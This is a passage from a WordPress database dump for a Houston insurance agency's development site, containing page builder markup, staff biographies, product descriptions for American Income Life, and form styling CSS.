19:53:02','',0,'http://cmdev-site1.com/et_header_layout/theme-builder-layout/',0,'et_header_layout','',0),(12,1,'2023-02-28 13:15:11','2023-02-28 13:15:11','','Default Website Template','','trash','closed','closed','','default-website-template__trashed','','','2023-03-26 19:51:28','2023-03-26 19:51:28','',0,'http://cmdev-site1.com/et_template/default-website-template/',0,'et_template','',0),(13,1,'2023-02-28 13:16:36','2023-02-28 13:16:36','','Default Website Template','','trash','open','closed','','theme-builder-layout__trashed','','','2023-03-26 19:51:28','2023-03-26 19:51:28','',0,'http://cmdev-site1.com/et_body_layout/theme-builder-layout/',0,'et_body_layout','',0),(14,1,'2023-02-28 13:16:56','2023-02-28 13:16:56','[et_pb_section fb_built=\"1\" theme_builder_area=\"post_content\" _builder_version=\"4.20.2\" _module_preset=\"default\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" column_structure=\"1_2,1_2\" theme_builder_area=\"post_content\"][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"1_2\" theme_builder_area=\"post_content\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Justin-Sutton-rev-1_black_on_transparent_high-res-1.png\" _builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\" title_text=\"Justin-Sutton-rev-1_black_on_transparent_high-res (1)\" hover_enabled=\"0\" sticky_enabled=\"0\"][/et_pb_image][/et_pb_column][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"1_2\" theme_builder_area=\"post_content\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\" hover_enabled=\"0\" sticky_enabled=\"0\" custom_margin=\"62px|||||\" custom_padding=\"29px||0px|||\"]<p style=\"text-align: center;\">340 North Sam Houston Parkway East<br />Houston, TX 77060<br /><a href=\"mailto:info@JSuttonFinancial.com\">info@JSuttonFinancial.com</a><br /><a href=\"tel:713-254-3439\">(713) 254-3439</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Default Website Template','','publish','open','closed','','theme-builder-layout','','','2023-03-26 19:56:16','2023-03-26 19:56:16','',0,'http://cmdev-site1.com/et_footer_layout/theme-builder-layout/',0,'et_footer_layout','',0),(15,1,'2023-02-28 13:17:12','2023-02-28 13:17:12','','Default Website Template','','inherit','closed','closed','','10-revision-v1','','','2023-02-28 13:17:12','2023-02-28 13:17:12','',10,'http://cmdev-site1.com/?p=15',0,'revision','',0),(16,1,'2023-02-28 13:17:12','2023-02-28 13:17:12','','Default Website Template','','inherit','closed','closed','','13-revision-v1','','','2023-02-28 13:17:12','2023-02-28 13:17:12','',13,'http://cmdev-site1.com/?p=16',0,'revision','',0),(17,1,'2023-02-28 13:17:12','2023-02-28 13:17:12','','Default Website Template','','inherit','closed','closed','','14-revision-v1','','','2023-02-28 13:17:12','2023-02-28 13:17:12','',14,'http://cmdev-site1.com/?p=17',0,'revision','',0),(23,1,'2023-02-28 13:30:05','2023-02-28 13:30:05','[et_pb_section fb_built=\"1\" _builder_version=\"4.20.0\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/02/J-Sutton-Financial-Houston-Skyline-w-white-logo-edited-2-28-2023.jpg\" min_height=\"580px\" custom_margin=\"||154px|||\" global_colors_info=\"{}\"][/et_pb_section]','Default Website Template','','inherit','closed','closed','','10-revision-v1','','','2023-02-28 13:30:05','2023-02-28 13:30:05','',10,'http://cmdev-site1.com/?p=23',0,'revision','',0),(19,1,'2023-02-28 13:19:08','2023-02-28 13:19:08','[et_pb_section fb_built=\"1\" theme_builder_area=\"post_content\" _builder_version=\"4.20.0\" _module_preset=\"default\" title_text=\"City of Houston Skyline July 4th 2018 with dramatic sunset\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/02/J-Sutton-Financial-Houston-Skyline-w-white-logo-edited-2-28-2023.jpg\" hover_enabled=\"0\" sticky_enabled=\"0\" custom_margin=\"||154px|||\" min_height=\"580px\"][/et_pb_section]','Default Website Template','','inherit','closed','closed','','10-revision-v1','','','2023-02-28 13:19:08','2023-02-28 13:19:08','',10,'http://cmdev-site1.com/?p=19',0,'revision','',0),(24,1,'2023-02-28 13:30:26','2023-02-28 13:30:26','','Theme Builder','','publish','closed','closed','','theme-builder','','','2023-02-28 13:30:26','2023-02-28 13:30:26','',0,'http://cmdev-site1.com/et_theme_builder/theme-builder/',0,'et_theme_builder','',0),(25,1,'2023-02-28 13:30:26','2023-02-28 13:30:26','','Default Website Template','','publish','closed','closed','','default-website-template-2','','','2023-02-28 13:30:26','2023-02-28 13:30:26','',0,'http://cmdev-site1.com/et_template/default-website-template-2/',0,'et_template','',0),(26,1,'2023-02-28 13:54:08','2023-02-28 13:54:08','[et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"||17px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_color=\"#FFFFFF\" header_2_font_size=\"50px\" global_colors_info=\"{}\"]<h2>Products &amp; Services</h2>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Shaking-Hands-Icon-No-Background-Hex-666666-scaled.jpg\" alt=\"handshake icon\" _builder_version=\"4.20.4\" _module_preset=\"default\" width=\"70%\" width_tablet=\"50%\" width_phone=\"50%\" width_last_edited=\"on|phone\" module_alignment=\"right\" custom_margin=\"||||false|false\" custom_padding=\"20px|||||\" animation_style=\"flip\" animation_direction=\"right\" hover_enabled=\"0\" module_alignment_tablet=\"center\" module_alignment_phone=\"center\" module_alignment_last_edited=\"on|desktop\" global_colors_info=\"{}\" sticky_enabled=\"0\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#000000\" header_text_color=\"#003372\" header_2_text_color=\"#003372\" custom_margin=\"48px|||||\" global_colors_info=\"{}\"]<h2 style=\"text-align: center;\">Our Promise To You</h2>\n<p>At J. Sutton Financial, our insurance products and services are backed by a promise.</p>\n<p>A Promise of: Financial security and protection for our clients. Commitment and fairness to our agents. Respect and opportunity for our employees. We are committed to bringing a quality product to market while providing the best service at the lowest possible cost.</p>\n<p>&nbsp;</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/About-American-Life-Insurance-Muted-scaled.jpg\" parallax=\"on\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" header_2_text_align=\"center\" header_2_text_color=\"#FFFFFF\" min_height=\"8px\" custom_margin=\"32px|||||\" global_colors_info=\"{}\"]<h2>About American Income Life Insurance Company</h2>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" global_colors_info=\"{}\"]<p>American Income Life is an international company protecting working families in the United States, Canada, New Zealand, and through their wholly-owned subsidary, National Income Life Insurance Company in New York. American Income Life has served working class families since 1951 with life, accident, and supplemental health products to help protect members of labor unions, credit unions, associations, and their families. AIL representatives develop long-term relationships with clients and meet them where they are most comfortable...their home.</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"66px|auto|66px|auto||\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" header_2_text_color=\"#003372\" global_colors_info=\"{}\"]<h2>American Income Life at a Glance</h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#2b2b2b\" custom_padding=\"29px||0px|||\" global_colors_info=\"{}\"]<ul>\n<li>Headquartered in Waco, Texas</li>\n<li>Life, accident, and supplemental health insurance</li>\n<li>Portable insurance coverage — if you move or change jobs, our insurance coverage stays with you</li>\n<li>Individual, single parent, and family policies available</li>\n</ul>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" header_2_text_color=\"#003372\" global_colors_info=\"{}\"]<h2>American Income Life\'s Parent Company</h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#2b2b2b\" global_colors_info=\"{}\"]<p>American Income Life is a wholly-owned subsidiary of Globe Life Inc (NYSE: GL), an S&amp;P 500 Company that markets life and supplemental health insurance for middle-income families through its affiliate companies.</p>\n<p>Globe Life is proudly the official life insurance company of the Dallas Cowboys &amp; owns the naming rights to Globe Life Park, home of the Texas Rangers.</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_enable_color=\"off\" custom_margin=\"-1px|||||\" custom_padding=\"1px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Umbrella-Roll-in-Icon.png\" url=\"https://www.ailife.com/products\" align=\"center\" _builder_version=\"4.20.4\" _module_preset=\"default\" width=\"50%\" width_tablet=\"50%\" width_phone=\"50%\" width_last_edited=\"on|desktop\" module_alignment=\"center\" custom_margin=\"||||false|false\" custom_padding=\"|0px||||\" animation_style=\"slide\" animation_direction=\"left\" animation_delay=\"200ms\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][/et_pb_image][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#2b2b2b\" header_3_font=\"||||||||\" header_3_text_align=\"center\" text_orientation=\"center\" custom_padding=\"8px||||false|false\" link_option_url=\"https://www.ailife.com/products\" border_radii=\"on|14px|14px|14px|14px\" border_color_all=\"#003372\" global_colors_info=\"{}\"]<h3>Life Insurance Policies</h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Contract-Icon-Grey-Background.png\" url=\"https://www.ailife.com/manage-my-policy\" align=\"center\" _builder_version=\"4.20.4\" _module_preset=\"default\" width=\"50%\" width_tablet=\"50%\" width_phone=\"50%\" width_last_edited=\"on|phone\" module_alignment=\"center\" custom_margin=\"||||false|false\" animation_style=\"slide\" animation_direction=\"right\" animation_delay=\"200ms\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][/et_pb_image][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#2b2b2b\" header_3_font=\"||||||||\" header_3_text_align=\"center\" text_orientation=\"center\" custom_padding=\"8px||||false|false\" link_option_url=\"https://www.ailife.com/manage-my-policy\" border_radii=\"on|14px|14px|14px|14px\" border_color_all=\"#003372\" global_colors_info=\"{}\"]<h3>Policyholder Services</h3>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||66px||false|false\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_cta button_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjgxOSJ9fQ==@\" url_new_window=\"on\" button_text=\"Request an agent today!\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_url\" _module_preset=\"default\" background_enable_color=\"off\" custom_button=\"on\" button_text_color=\"#ffffff\" button_bg_color=\"#003372\" button_border_width=\"0px\" button_border_radius=\"14px\" background_layout=\"light\" custom_margin=\"-46px|||||\" box_shadow_style_button=\"preset2\" global_colors_info=\"{}\"][/et_pb_cta][/et_pb_column][/et_pb_row][/et_pb_section]','Products & Services','','publish','closed','closed','','products-services','','','2023-04-11 21:42:28','2023-04-11 21:42:28','',0,'http://cmdev-site1.com/?page_id=26',0,'page','',0),(227,1,'2023-03-12 05:23:19','2023-03-12 05:23:19','','Insurance Quote','','inherit','closed','closed','','225-revision-v1','','','2023-03-12 05:23:19','2023-03-12 05:23:19','',225,'http://cmdev-site1.com/?p=227',0,'revision','',0),(225,1,'2023-03-12 05:23:19','2023-03-12 05:23:19','[et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"200.8px\" custom_margin=\"-14px|||||\" custom_padding=\"66px|||||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_text_divider header=\"How much insurance do you need?\" color=\"#003372\" divider_style=\"dotted\" divider_weight=\"3px\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_level=\"h2\" header_text_align=\"center\" header_text_color=\"#000000\" header_font_size=\"30px\" global_colors_info=\"{}\"][/dsm_text_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.0\" _module_preset=\"default\" custom_margin=\"-50px||||false|false\" custom_padding=\"10px||||false|false\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.0\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.0\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"]<p>[gravityform id=\"1\" title=\"false\" description=\"false\" ajax=\"true\"]</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Insurance Quote','','publish','closed','closed','','insurance-quote','','','2023-04-03 23:56:12','2023-04-03 23:56:12','',0,'http://cmdev-site1.com/?page_id=225',0,'page','',0),(33,1,'2023-02-28 13:53:19','2023-02-28 13:53:19','<div id=\"comp-l7tp3rv01\" class=\"KcpHeO tz5f0K comp-l7tp3rv01 wixui-text\" data-testid=\"richTextElement\">\r\n<h3 class=\"font_5\" style=\"text-align: center;\">Get to Know Us</h3>\r\n</div>\r\n<div id=\"comp-l7tp3rv4\" class=\"KcpHeO tz5f0K comp-l7tp3rv4 wixui-text\" data-testid=\"richTextElement\">\r\n<p class=\"font_7\" style=\"text-align: center;\">J. Sutton Financial was founded in 2022 with a vision to extend career opportunities beyond its home city.</p>\r\n<p class=\"font_7\" style=\"text-align: center;\">We service clients and work as a team</p>\r\n<p class=\"font_7\" style=\"text-align: center;\">at our home office in Houston as well as 100% remote. This allows us to have an incredible office culture and service more clients with an agent reach from coast-to-coast.</p>\r\n\r\n<h3 class=\"font_5\" style=\"text-align: center;\">Partners</h3>\r\n<div id=\"comp-l6v9yz79\" class=\"BaOVQ8 tz5f0K comp-l6v9yz79 wixui-text\" data-testid=\"richTextElement\">\r\n<p class=\"font_8\" style=\"text-align: center;\"><strong><span class=\"color_15\">Trusted and Endorsed</span></strong></p>\r\n\r\n</div>\r\n<div id=\"comp-l6v9yz791\" class=\"KcpHeO tz5f0K comp-l6v9yz791 wixui-text\" data-testid=\"richTextElement\">\r\n<p class=\"font_9\" style=\"text-align: center;\"><span class=\"color_15\">J. Sutton Financial believes in delivering a wonderful experience, enterprise professionalism, and real results. Step one to our success has always been putting our clients first. We\'re always looking to grow with the right people. Take a look below to learn more about our partners and how you, too, can join our incredible team!</span></p>\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n<div id=\"comp-l7tp3rv4\" class=\"KcpHeO tz5f0K comp-l7tp3rv4 wixui-text\" data-testid=\"richTextElement\">\r\n\r\n<img class=\"aligncenter size-medium wp-image-29\" src=\"http://cmdev-site1.com/wp-content/uploads/2023/02/justinsuttonheadshotsmall-Black-White-300x284.png\" alt=\"\" width=\"300\" height=\"284\" />\r\n<div id=\"comp-l6v9yz7a\" class=\"KcpHeO tz5f0K comp-l6v9yz7a wixui-text\" data-testid=\"richTextElement\">\r\n<p class=\"font_6\" style=\"text-align: center;\"><span class=\"color_15\"><strong>Justin Sutton</strong>\r\n</span>Owner/Founder</p>\r\n\r\n</div>\r\n<div id=\"comp-l6v9yz7a1\" class=\"KcpHeO tz5f0K comp-l6v9yz7a1 wixui-text\" data-testid=\"richTextElement\">\r\n<p class=\"font_8\" style=\"text-align: center;\"><span class=\"color_15\">Justin has worked in the financial services industry for over 8 years. In 2016 the Giddens Nation was formed, where Justin worked alongside brothers Ryan and Stephen, running a satellite office in Waco, TX, and eventually becoming the Senior Regional Director of the Giddens-Giddens Agency. In 2022 Justin formed J. Sutton Financial to extend the reach of the Giddens-Giddens agency into the 100% remote hemisphere of the Fin</span><span class=\"color_15\">ancial Services Industry.</span></p>\r\n&nbsp;\r\n\r\n</div>\r\n<img class=\"aligncenter size-medium wp-image-30\" src=\"http://cmdev-site1.com/wp-content/uploads/2023/02/sethheadshot-Black-White-273x300.png\" alt=\"\" width=\"273\" height=\"300\" />\r\n\r\n</div>\r\n<div id=\"comp-l6v9yz7b2\" class=\"KcpHeO tz5f0K comp-l6v9yz7b2 wixui-text\" data-testid=\"richTextElement\">\r\n<p class=\"font_6\" style=\"text-align: center;\"><span class=\"color_15\"><strong>Seth Ordeneaux</strong>\r\n</span>Managing Director</p>\r\n\r\n</div>\r\n<div id=\"comp-l6v9yz7c\" class=\"KcpHeO tz5f0K comp-l6v9yz7c wixui-text\" data-testid=\"richTextElement\">\r\n<p class=\"font_8\" style=\"text-align: center;\"><span class=\"color_15\">Since Starting with the company in April 2020, Seth has had the opportunity to learn from and develop some of the top leaders in our company. His ability to build relationships with his clients and colleagues has led him to become one of the Top managers in our industry, with several notable accomplishments from top representative to top manager in a very short amount of time.</span></p>\r\n&nbsp;\r\n\r\n</div>\r\n<img class=\"aligncenter size-medium wp-image-31\" src=\"http://cmdev-site1.com/wp-content/uploads/2023/02/F588F955-17B7-46C3-AE39-F6F2077500AE_edited_edited-Black-White-300x292.png\" alt=\"\" width=\"300\" height=\"292\" />\r\n<div id=\"comp-l6v9yz7d\" class=\"KcpHeO tz5f0K comp-l6v9yz7d wixui-text\" data-testid=\"richTextElement\">\r\n<p class=\"font_6\" style=\"text-align: center;\"><span class=\"color_15\"><strong>Matthew Sutton</strong>\r\n</span>Managing Director</p>\r\n\r\n</div>\r\n<div id=\"comp-l6v9yz7d1\" class=\"KcpHeO tz5f0K comp-l6v9yz7d1 wixui-text\" data-testid=\"richTextElement\">\r\n<p class=\"font_8\" style=\"text-align: center;\"><span class=\"color_15\">Matthew\'s career has been nothing short of incredible. With just 5 years in the financial services industry, Matthew has accomplished achievement after achievement. In recent years he has won two separate contests (March Madness/Battle of the Nation), and if that wasn\'t enough, he also leads one of the most powerful teams in our industry.</span></p>\r\n&nbsp;\r\n\r\n<img class=\"aligncenter size-medium wp-image-32\" src=\"http://cmdev-site1.com/wp-content/uploads/2023/02/322630_f5d4b3c18c504cd7a2cadd94a2a0cf51_mv2-Black-White-300x293.png\" alt=\"\" width=\"300\" height=\"293\" />\r\n<p style=\"text-align: center;\"><strong>Andres Cano</strong>\r\nManaging Director</p>\r\n<p style=\"text-align: center;\">Andres\' career with J. Sutton Financial started in the middle of the pandemic. As a recent college graduate from the University of Texas at El Paso, Andres found an opportunity to excel within a troubling job market at J. Sutton Financial. Andres is currently working with his team on the expansion of our Latino Division.</p>\r\n\r\n\r\n<hr />\r\n\r\n\r\n\r\n<hr />\r\n\r\n&nbsp;\r\n\r\n</div>','Our Story','','inherit','closed','closed','','26-revision-v1','','','2023-02-28 13:53:19','2023-02-28 13:53:19','',26,'http://cmdev-site1.com/?p=33',0,'revision','',0),(50,1,'2023-02-28 16:26:44','2023-02-28 16:26:44','<div id=\"comp-l7tp3rv01\" class=\"KcpHeO tz5f0K comp-l7tp3rv01 wixui-text\" data-testid=\"richTextElement\">\n<h2 class=\"font_5\" style=\"text-align: center;\">Get to Know Us</h2>\n</div>\n<div id=\"comp-l7tp3rv4\" class=\"KcpHeO tz5f0K comp-l7tp3rv4 wixui-text\" data-testid=\"richTextElement\">\n<p class=\"font_7\" style=\"text-align: center;\">J. Sutton Financial was founded in 2022 with a vision to extend career opportunities beyond its home city.</p>\n<p class=\"font_7\" style=\"text-align: center;\">We service clients and work as a team</p>\n<p class=\"font_7\" style=\"text-align: center;\">at our home office in Houston as well as 100% remote. This allows us to have an incredible office culture and service more clients with an agent reach from coast-to-coast.</p>\n\n<h2 class=\"font_5\" style=\"text-align: center;\">Partners</h2>\n<div id=\"comp-l6v9yz79\" class=\"BaOVQ8 tz5f0K comp-l6v9yz79 wixui-text\" data-testid=\"richTextElement\">\n<p class=\"font_8\" style=\"text-align: center;\"><em><strong><span class=\"color_15\">Trusted and Endorsed</span></strong></em></p>\n\n</div>\n<div id=\"comp-l6v9yz791\" class=\"KcpHeO tz5f0K comp-l6v9yz791 wixui-text\" data-testid=\"richTextElement\">\n<p class=\"font_9\" style=\"text-align: center;\"><span class=\"color_15\">J. Sutton Financial believes in delivering a wonderful experience, enterprise professionalism, and real results. Step one to our success has always been putting our clients first. We\'re always looking to grow with the right people. Take a look below to learn more about our partners and how you, too, can join our incredible team!</span></p>\n\n</div>\n</div>\n<div id=\"comp-l7tp3rv4\" class=\"KcpHeO tz5f0K comp-l7tp3rv4 wixui-text\" data-testid=\"richTextElement\">\n\n<img class=\"aligncenter size-medium wp-image-29\" src=\"http://cmdev-site1.com/wp-content/uploads/2023/02/justinsuttonheadshotsmall-Black-White-300x284.png\" alt=\"\" width=\"300\" height=\"284\" />\n<div id=\"comp-l6v9yz7a\" class=\"KcpHeO tz5f0K comp-l6v9yz7a wixui-text\" data-testid=\"richTextElement\">\n<p class=\"font_6\" style=\"text-align: center;\"><span class=\"color_15\"><strong>Justin Sutton</strong>\n</span>Owner/Founder</p>\n\n</div>\n<div id=\"comp-l6v9yz7a1\" class=\"KcpHeO tz5f0K comp-l6v9yz7a1 wixui-text\" data-testid=\"richTextElement\">\n<p class=\"font_8\" style=\"text-align: center;\"><span class=\"color_15\">Justin has worked in the financial services industry for over 8 years. In 2016 the Giddens Nation was formed, where Justin worked alongside brothers Ryan and Stephen, running a satellite office in Waco, TX, and eventually becoming the Senior Regional Director of the Giddens-Giddens Agency. In 2022 Justin formed J. Sutton Financial to extend the reach of the Giddens-Giddens agency into the 100% remote hemisphere of the Fin</span><span class=\"color_15\">ancial Services Industry.</span></p>\n\n\n</div>\n<img class=\"aligncenter size-medium wp-image-30\" src=\"http://cmdev-site1.com/wp-content/uploads/2023/02/sethheadshot-Black-White-273x300.png\" alt=\"\" width=\"273\" height=\"300\" />\n\n</div>\n<div id=\"comp-l6v9yz7b2\" class=\"KcpHeO tz5f0K comp-l6v9yz7b2 wixui-text\" data-testid=\"richTextElement\">\n<p class=\"font_6\" style=\"text-align: center;\"><span class=\"color_15\"><strong>Seth Ordeneaux</strong>\n</span>Managing Director</p>\n\n</div>\n<div id=\"comp-l6v9yz7c\" class=\"KcpHeO tz5f0K comp-l6v9yz7c wixui-text\" data-testid=\"richTextElement\">\n<p class=\"font_8\" style=\"text-align: center;\"><span class=\"color_15\">Since Starting with the company in April 2020, Seth has had the opportunity to learn from and develop some of the top leaders in our company. His ability to build relationships with his clients and colleagues has led him to become one of the Top managers in our industry, with several notable accomplishments from top representative to top manager in a very short amount of time.</span></p>\n\n\n</div>\n<img class=\"aligncenter size-medium wp-image-31\" src=\"http://cmdev-site1.com/wp-content/uploads/2023/02/F588F955-17B7-46C3-AE39-F6F2077500AE_edited_edited-Black-White-300x292.png\" alt=\"\" width=\"300\" height=\"292\" />\n<div id=\"comp-l6v9yz7d\" class=\"KcpHeO tz5f0K comp-l6v9yz7d wixui-text\" data-testid=\"richTextElement\">\n<p class=\"font_6\" style=\"text-align: center;\"><span class=\"color_15\"><strong>Matthew Sutton</strong>\n</span>Managing Director</p>\n\n</div>\n<div id=\"comp-l6v9yz7d1\" class=\"KcpHeO tz5f0K comp-l6v9yz7d1 wixui-text\" data-testid=\"richTextElement\">\n<p class=\"font_8\" style=\"text-align: center;\"><span class=\"color_15\">Matthew\'s career has been nothing short of incredible. With just 5 years in the financial services industry, Matthew has accomplished achievement after achievement. In recent years he has won two separate contests (March Madness/Battle of the Nation), and if that wasn\'t enough, he also leads one of the most powerful teams in our industry.</span></p>\n\n\n<img class=\"aligncenter size-medium wp-image-32\" src=\"http://cmdev-site1.com/wp-content/uploads/2023/02/322630_f5d4b3c18c504cd7a2cadd94a2a0cf51_mv2-Black-White-300x293.png\" alt=\"\" width=\"300\" height=\"293\" />\n<p style=\"text-align: center;\"><strong>Andres Cano</strong>\nManaging Director</p>\n<p style=\"text-align: center;\">Andres\' career with J. Sutton Financial started in the middle of the pandemic. As a recent college graduate from the University of Texas at El Paso, Andres found an opportunity to excel within a troubling job market at J. Sutton Financial. Andres is currently working with his team on the expansion of our Latino Division.</p>\n\n\n<hr />\n\n\n\n<hr />\n\n</div>','Our Story','','inherit','closed','closed','','26-revision-v1','','','2023-02-28 16:26:44','2023-02-28 16:26:44','',26,'http://cmdev-site1.com/?p=50',0,'revision','',0),(35,1,'2023-02-28 14:07:12','2023-02-28 14:07:12','.gform_wrapper.gravity-theme .gform_footer button, .gform_wrapper.gravity-theme .gform_footer input {color: #FFFFFF!important;\r\n    border-width: 0px!important;\r\n    border-color: RGBA(255,255,255,0);\r\n    border-radius: 14px;\r\n    font-size: 20px;\r\n    background-color: #003372;\r\n	padding: 10px 15px 15px 10px;\r\n}\r\n.gform_wrapper.tc_wrapper {\r\n    width: 800px;\r\n    margin: 0 auto;\r\n    background: #fff;\r\n    padding: 30px;\r\n    border: 1px solid rgba(0,0,0,.1);\r\n    border-radius: 8px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gform_heading {\r\n    display: none;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper h3 {\r\n    padding: 0;\r\n    font-weight: 700;\r\n    text-align: center;\r\n    color: #000;\r\n    font-size: 26px;\r\n    margin-bottom: 30px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.two_box {\r\n    display: grid;\r\n    grid-template-columns: 5fr 7fr;\r\n    column-gap: 40px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.two_box .gfield_description {\r\n    padding: 0;\r\n    font-size: 13px;\r\n    color: #000;\r\n    line-height: 18px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.two_box .gfield_label, .gform_wrapper.tc_wrapper .gfield.two_box .validation_message {\r\n    grid-column: 1/-1;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper input[type=text], .gform_wrapper.tc_wrapper input[type=email], .gform_wrapper.tc_wrapper input[type=tel], .gform_wrapper.tc_wrapper input[type=number] {\r\n    border: 1px solid #999;\r\n    outline: none;\r\n    border-radius: 5px;\r\n    padding: 12px 15px;\r\n    font-size: 15px !important;\r\n    transition: 0.3s;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper input[type=text]:focus, .gform_wrapper.tc_wrapper input[type=email]:focus, .gform_wrapper.tc_wrapper input[type=tel]:focus, .gform_wrapper.tc_wrapper input[type=number]:focus {\r\n    border-color: #333;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper input[type=number]::-webkit-outer-spin-button, .gform_wrapper.tc_wrapper input[type=number]::-webkit-inner-spin-button {\r\n    -webkit-appearance: none;\r\n    -moz-appearance: 